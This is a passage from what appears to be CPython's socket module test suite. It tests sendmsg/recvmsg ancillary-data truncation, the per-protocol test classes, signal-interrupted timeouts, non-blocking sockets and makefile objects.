(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecondCmsgTruncInData.client_skip
def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITETestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPLITETest(SendmsgConnectionlessTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPLITETest(RecvmsgTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPLITETest(RecvmsgIntoTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITE6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITE6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDPLITE6Test(SendmsgConnectionlessTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDPLITE6Test(RecvmsgTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDPLITE6Test(RecvmsgIntoTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDPLITE6Test(RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDPLITE6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase:
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = support.LOOPBACK_TIMEOUT
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
# When a Python socket has a non-zero timeout, it's switched
# internally to a non-blocking mode. Later, sock.sendall(),
# sock.recv(), and other socket operations use a select() call and
# handle EWOULDBLOCK/EGAIN on all socket operations. That's how
# timeouts are enforced.
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
def testInheritFlagsBlocking(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must inherit
# the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(False)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], support.LONG_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(False)
# the server didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], support.LONG_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
# the server sent data yet: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(TimeoutError, self.read_file.read, 1)
# Second read is disallowed
